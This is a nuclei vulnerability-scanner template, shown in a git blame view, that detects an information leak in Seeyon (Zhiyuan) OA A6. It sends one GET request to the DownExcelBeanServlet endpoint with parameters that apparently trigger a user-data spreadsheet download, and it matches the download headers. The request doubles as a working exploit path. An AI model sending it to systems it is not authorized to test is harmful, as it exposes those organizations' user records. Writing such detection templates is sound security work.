nuclei-templates/http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml

30 lines
676 B
YAML
Raw Normal View History

2021-02-24 08:07:57 +00:00
id: zhiyuan-oa-info-leak
info:
name: Zhiyuan Oa A6-s info Leak
author: pikpikcu
severity: info
reference:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
tags: zhiyuan,leak,disclosure,seeyon
metadata:
max-request: 1
2021-02-24 08:07:57 +00:00
http:
2021-02-24 08:07:57 +00:00
- method: GET
path:
- "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
matchers-condition: and
matchers:
- type: word
words:
2021-02-24 17:52:23 +00:00
- "attachment"
- "application/x-msdownload"
2021-02-24 08:07:57 +00:00
part: header
2021-02-24 17:52:23 +00:00
condition: and
2021-02-24 08:07:57 +00:00
- type: status
status:
- 200